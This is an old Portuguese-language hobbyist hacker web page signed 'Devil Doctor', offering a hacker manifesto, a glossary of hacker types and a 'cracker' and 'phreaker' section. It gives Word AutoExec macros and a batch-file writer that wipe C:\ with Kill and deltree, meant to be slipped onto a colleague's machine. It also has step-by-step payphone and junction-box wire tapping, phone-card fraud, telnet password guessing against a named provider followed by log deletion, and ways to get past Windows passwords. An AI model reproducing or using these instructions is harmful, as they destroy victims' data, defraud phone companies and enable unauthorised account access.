Site hosted by Angelfire.com: Build your free website today!

 Nao me responsabilizo por nada que contenha nesta página ou o que seu conteudo venha causar; por favor se você não concordar, peço que tecle  BACK em seu navegador. Grato.
 

 
 
Hackers - Apresentação

"Entre no meu mundo... O mundo dos elétrons e dos switchs, da beleza dos baunds. Fazemos uso de um serviço que não é de graça, mas poderia ser mais barato se não fosse administrado por glutões em busca de lucros. Buscamos o conhecimento, e vocês nos chamam de criminosos. Exploramos, e vocês nos chamam de criminosos. Não temos nacionalidade nem tendências religiosas. Vocês constroem bombas nucleares, criam guerras, trapaceiam e mentem para nós e nos fazem acreditar que é para o nosso próprio bem. Sim, sou um criminoso. Meu crime é o da curiosidade, meu crime é julgar as pessoas pelo que fazem e pensam, não pela sua aparência. Meu crime é ser mais inteligente que vocês, algo pelo qual vocês nunca vão me perdoar. Sou um hacker, e esse é meu manifesto. Vocês podem deter a mim, mas nunca poderão deter todos nós."
                                                                        Por Devil Doctor
Hacker,Cracker e Phreaker

Introdução

Existem livros que explicam como os grandes hackers entraram nos sistemas fechados, desta forma você pode tirar algumas idéias em como abrir sistemas fechados. Para se ter uma idéia o primeiro livro que li sobre este assunto foi Crime por Computador de Donn B. Parker de 1977, isto mesmo 1977. Para se ter uma idéia, um chefe de contabilidade de uma pequena firma desviou um milhão de dólares, usando um computador para planejar e realizar o seu desfalque, ou então, um jovem ladrão conseguiu acesso ao computador de cuma companhia telefônica e em dois anos roubou cerca de um milhão de dólares em equipamentos. Foi preso porque um de seus empregados o denunciou. Depois de passar 40 dias na cadeia, voltou a trabalhar - desta vez, como consultor de segurança de computadores. Hoje em dia, a história mais conhecida foi a prisão do cker Kevin Mitnick em 25 de fevereiro de 1995. Este hacker capturado pelo FBI com auxílio do especialista em segurança de computadores Tsutomu Shimomura (um ex-hacker). Este história já rendeu dois livros, um deles o Contra-Ataque foi escrito pôr Tsutomu Shimomura e John Markoff, um experiente jornalista especializado em tecnologias e o outro livro o Jogo do Fugitivo de Jonathan Littman que é um jornalista bem relacionado no submundo da rede. Qualquer um desses livros atrai com certeza a curiosidade sobre histórias verídicas e temos a sensação de estar no limiar entre a ficção científica e a realidade.

Se isso pode acontecer em grandes, pequenas e médias empresas, pode acontecer também com você! Na verdade já está acontecendo no Brasil.

E isto é só o começo!

 
 

 
 
    Mess with the best die like the rest - Zero Cool
 

Saiba quem é quem Mess with the best die like the rest - Zero Cool

Mas afinal, quem são os hackers? Apenas criminosos digitais ou simples curiosos? O tema é polêmico a começar pelo próprio nome. O termo hacker já se encontra hoje associado a pirata digital, invasor de sistemas e criminoso. Mas nem sempre foi assim: segundo o "The New Hacker's Dicitonary", o hacker é uma pessoa que gosta de explorar os detalhes dos sistemas e descobrir como obter o máximo de sua capacidade, em oposição à maioria dos usuários, que preferem aprender apenas o mínimo necessário. Seguindo rigorosamente o vocabulário do meio, o hacker que se dedica a roubar arquivos ou destruir dados ganhar outro nome: cracker. Esses sim são perigosos. Veja abaixo:

Lamer - é o principiante que se acha o máximo. Acabou de ganhar um micro e já quer invadir computadores;

Wannabe - é o principiante que aprendeu a usar alguns programas prontos para descobrir senhas ou invadir sistemas (receitas de bolo), entrou num provedor de fundo de quintal e já acha que vai conseguir entrar nos computadores da Nasa;

Newbie - é o(a) novato(a) na rede. Ele(a) se mete em lugares que não devia, faz perguntas que não deve. Mas isso não seria uma atitude lamer? Na verdade é uma atitude ingênua. Mas aquele cara que entra num chat com nick de "newbie" é um otário querendo dar uma de ingênuo. Pôr mais que o cara seja ingênuo, ele não vai entrar na sala com isso estampado na cara.

Larva - este já está quase se tornando um hacker. Já consegue desenvolver suas próprias técnicas de como invadir sistemas; Hacker - tem conhecimentos reais de programação e de sistema operacionais, principalmente o Unix, o mais usado dos servidores da Internet. Conhece todas as falhas de segurança dos sistemas e procura achar novas. Desenvolve suas próprias técnicas e desprezas as "receitas de bolo";

Cracker - é o hacker do mal, que invade sistemas, enfim afim de dar problemas à algo ou à alguém;

Phreaker - tem bons conhecimentos de telefonia e consegue inclusive fazer chamadas internacionais sem pagar, o que lhe premite desenvolver seus ataques a partir de um servidor de outro país;

Guru - o supra-sumo dos hackers.

Agora que você já aprendeu alguns conhecimentos básicos vamos ao que interessa:
 

 

 
 

Como se tornar um hacker

Primeiramente, nunca pergunte isso. Agora, na encolha, vamos te dar algumas dicas. E essa foi a primeira. A segunda é adquirir cada vez mais conhecimento. A palavra é "conhecimento". Um hacker não precisa só de programas e dicas. Ele precisa de conhecimento. Ele tem que conhecer o terreno em que tá pisando, entender o que está fazendo, para fazer direito. Tudo que você precisa saber:

1.Nunca pergunte como se tornar um hacker;

2.Conhecimento. Poxa... o que é IP?

Realmente, poucos sabem o seu significado.

IP é Internet Protocol.

Onde Começar ?

Comece com sistemas pequenos como em universidades ou escritórios. Depois passe para redes maiores como telenet. A telenet é altamente recomendada para novatos, pois ela tem um sistema de segurança muito vago. São milhares de conexões ao mesmo tempo, o que torna praticamente impossível a monitoração de um usuário (você).

Regras hackers.

1- Nunca destruir nenhum sistema.

2- Nunca alterar nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada posteriormente.

3- Não compartilhe com ninguém seus projetos hackers com ninguém

4- Em uma BBS, não é aconselhável que você discuta seus projetos hackers. BBS's podem ser monitoradas pelo governo.

5- Nunca dê nomes ou telefones reais em uma BBS.

6- Nunca deixe seu apelido em um sistema que você entrou.

7- NÃO entre em computadores governamentais.

8- Nunca converse sobre seus planos hackers com outra pessoa do telefone de sua casa.

9- Seja atento. Mantenha todo o seu material hacker em um lugar seguro.

10- Para se tornar um verdadeiro hacker você deve simplesmente praticar.

Ética hacker

A ética hacker pode ser definida numa frase:

Veja tudo, aprenda tudo, não toque em nada.

Crakers

=> Macros do Word

Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto.

Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens com usuarios pentelhos.

ps: Software/versao Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95)

O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.

Niveis de sacanagem Nivel 1..... Apenas uma brincadeira

Nivel 2..... Apenas uma brincadeira de mau gosto

Nivel 3..... não é mais brincadeira.

Primeiro voce precisa criar uma macro... siga os passos: Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.

ps: existe outras formas/meios d criar uma macro,mas esta é mais simples.

Nivel 1

O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do que ninguem. Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.

Sub MAIN MsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub

Nivel 2

É para deixar o usuario irritadissimo. no corpo da macro cole este texto abaixo:

Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub

Nivel 3

Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.

Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WINWORD\*.*" End Sub

Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,entao se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.

Detalhes: Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas não irei falar, descubra voce mesmo. A macro do word é uma ferramenta riquissima, procure fucar. Voce pode fazer estas no seu proprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para não explodir em voce. não me responsabilizo por qualquer ato.

=> Como criar um autoexec.bat destrutivo

O exemplo abaixo faz com que o vírus crie um arquivo autoexec.bat destrutivo, fazendo com que assim que o computador seja reiniciado, o comando deltree sera ativado apagando todos os diretórios do computador. Open "C:\autoexec.bat" For Output As #1 Print #1, "@deltree /y *.* >nul" Close #1

=> Apagar um arquivo

Esse comando apaga um arquivo: kill "c:\windows\win.com"


Phreaking
 

Telefonia Brasileira

      Por acaso você já contou o quanto de fichas telefonicas já gastou em sua vida (principalmente quem não tem telefone), agora imagine e multiplique por R$ 0,10 faça também isso com cartões telefônicos e ficará pasmo (a).Agora, pessoal, a ficha telefonica de R$ 0,10 só dá 2 mim. de ligação local (antes era 3mim.). Agora, pessoal, o cartão telefonico se esgota muito mais rápido. Para ligações locais de sua casa você vai ter que pagar 270%, a mais e 30% a mais para Interurbanos. De acordo com o aumento de abril de 1997. Eu acho uma coisa tão vulga e tão ladra ter que pagar para conversar, um sentido que recebemos da natureza, ainda mais quando se tem aumentos explosivos como esses de hoje em dia.Hackers do Brasil, vamos mostrar a eles quem é que manda, vamos desafiá-los e teremos algo que eles nunca farão nós nos esquecer.Acompanhe aqui formas de burlar, fraudar, e estraçalhar a roubalheira da TELESP, TELERJ, EMBRATEL e muitas outros organizações de telefonia...



 
Fraudando orelhões com um aparelho comum
 

    Modo de fraude com telefone comum à orelhões públicos:Primeiro você deve arrumar um telefone comum bem pequeno e compacto. Depois você tem que descascar os fios dele (vão dar em 2 fios). Então arrume um bom alicate, estilete ou faca e vá até um orelhão.Descasque os fios do orelhão (descasque, não é para cortar) pegue os dois fios descascados do orelhão e entrelace com os dois fios do seu telefone, observe a polarização, ou seja se o seu telefone portátil ficar sem linha inverta a posição dos fios telefônicos, pois, ao contrário do que muita gente pensa o orelhão tem fio negativo e positivo. Agora é só efetuar a ligação de seu telefone comum...


Fraude a orelhões através de notebook

    O processo para se conectar notebooks a orelhões, é igual ao de se conectar telefones comuns.  Resumirei nesse item, algumas considerações a respeito da fiação do notebook, que segue os padrões da FCC Americana e é um pouco diferente da nossa.O conector do fio do notebook, é do tipo jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dios fios centrais e separe-os dos fios das extremidades.Estes dois fios centrais, são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles (pequeno gancho achado em qualquer loja de componentes eletrônicos).Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se está tudo ok, abra um programa de terminal qualquer e digite ATA, se fizer um barulhinho parecido com o tom de linha está tudo OK.  


Fraude em Caixa de Verificação
 

    As caixas de verificação (ou armários na linguagem "técnica" da TELESP) são caixas de ferro, que geralmente ficam localizadasem vias públicas, e são utilizadas para se fazer a checagem das linhas telefônicas e detectar problemas antes que chegue a central. Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura, com um código em preto escrito na parte superior.Para fazer tal tipo de fraude, basta, que você pegue um das dezenas de pares de fios que se encontram lá e entrelaçe nos 2 fos de seu telefone portátil, cujo qual estará com seus fios descascados. Observe também a polarização. Vale lembrar que você não deve destruir a caixa para abrí-la, se é que ela já não esteja arrombada. Não vá arrombar a porra da cixa. Isto é coisa pra quem não tem cérebro. E você não é um vândalo, você é um Hacker...OBS : Existem mais umas 2 formas de fraude, não vou por aqui porque o verdadeiro Hacker descobre o que necessita.

Ser Phreaker é mais que desenvolver um crime,
é desenvolver uma incrível maneira de se viver...
 

=> Ligando em orelhões à cartão sem pagar

Usando um cartão usado de 50 ligações, com a parte de trás pintata com grafite nº6.

Usando um cartão novo, com a parte de trás pintata com esmalte base de unha.

Usando um cartão usado, envolvido por papel alumínio.

Usando um cartão usado de 50 ligações, com a parte de trás raspada com uma moeda.

Usando um cartão novo, após completar a ligação(a pessoa falar Aló)segura-se o nº9 tira o cartão e continue segurando o botão até acabar de falar.

=> Regras Phreakers :
 

1- Nunca use as boxes na linha da sua casa.

2- Nunca converse sobre seus projetos phreakers na linha de sua casa.

3- Nunca use seu nome real quando fazer o phreak.

4- Seja cuidadoso com que comentar sobre seus projetos preakers.

5- Nunca deixe material phreak em qualquer lugar, sempre tenha um esconderijo para guardá-lo protegido.

6- Não seja pego.

*********************************************************
Senhas
 
 
  1. Cavalo de Tróia

  2. O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
     
  3. Farejamento de redes

  4. Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
     
  5. Engenharia social

  6. É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
     
  7. Quebra-cabeça

  8. Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
     
  9. Invasão do servidor

  10. O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
     
  11. Dedução

  12. Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
    1. Cerca de 1 em cada 30 usuários usa o login como senha.
    2. Muitos administradores usam a senha padrão do sistema.
    3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain
     

Mãos à obra!

 
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.
Como adivinhar uma Senha

Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando por base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se divinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação. omo podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícel de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.

Bios Password

Se você pegar o computador desligado ou esquecer o password:

- Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou ou coloque od dados padrao.

Password do Windows

Para quebrar o password do Windows 3.x você deve digitar"ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Para quebrar o password no WIN95:

1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar.

2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Screen Saver Password

Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password.

Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas.

*********************************************************

Dicas

Telas de abertura e finalização do Windows95

Antes de mais nada, faça um back-up dos arquivos citados abaixo, caso queira voltar o micro ao normal:

c:\windows\logos.sys

c:\windows\logow.sys

1 Passo: Salve o arquivo desejado para seu Hard Disk

2 Passo:descompacte o arquivo ZIP

3 Passo: Copie os arquivos logos.sys e logow.sys para C:\WINDOWS e logo.sys para C:\

Página na Geocities - Free Home Page

Essa seção é para você que quer colocar a sua página na World Wide Web gratuitamente. O mais conhecido serviço que possibilita a montagem gratuita de sites na Web é o Geocities. a empresa americana não cobra nada para manter sites pessoais em seus servidores. O serviço dá direito a 1MB de espaço em disco para as páginas. Não há muitas restrição quanto ao conteúdo, mas se o usuário ficar muito tempo sem atualizar suas páginas pode ser convidado a se retirar. Veja agora como fazer o seu cadastro. 1 - Em Neighborhood Directory escolha a vizinhança que mais se afina com a sua forma de ser e de pensar: Athens, Hollywood, Rainforest, Baja etc. Assim que escolher a vizinhança clique em Join this Neighborhood.

2 - É a hora de usar a ferramenta de procura (endereços vazios). Clique em Find vacancies here.

3 - Preencha Choose Address Range. Para ter uma chance maior de encontrar um endereço desocupado, preencha com 1000 e 9999. Caso apareça No Vacancies located in specified Range significa que não há lugar vazio, portante tente uma outra vizinhança.

4 - Exemplo: There are 2 addresses vacant in the Paris/LeftBank6850 Block vacant. Significa que tem 2 endereços vazios no bloco 6850 da vizinhança Paris/LeftBank. Clique onde tiver maior número de endereços vazios, ou no bloco que desejar.

5 - Espere a página carregar e procure um gif com uma casa vazia.

6 - Clicando sobre essa gif, você chegará finalmente ao formulário.

7 - Após preencher e enviar o formulário, aguarde alguns instantes para receber e-mail com a confirmação do seu endereço e com instroções para colocar a sua página no ar.

Endereço: http://www.geocities.com/Eureka/residence.html

..........................................Mudar isto  para mudar de lugar!!!

                                                                            Devil Doctor - D.D.

*********************************************************
The End
 
Vc vê o que eu vejo? 
Esse não é o seu H.D.? He He He... Eu acho que sim ...
 
 
       QQ dúvida, clique na caveira p/ mandar um E-mail para :

                           Devil Doctor  
 

 

  • Unix
  • O hacker Mitnick
  • Sites
  • Hackear por Ftp
  • Virus por ext. Bat
  • Dinheiro fácil
  • Como fazer minha própria home page
  • Básico para hackers iniciantes
  • Learn more about computer viruses
  • Hack Guide
  • Disquete - Bomba
  •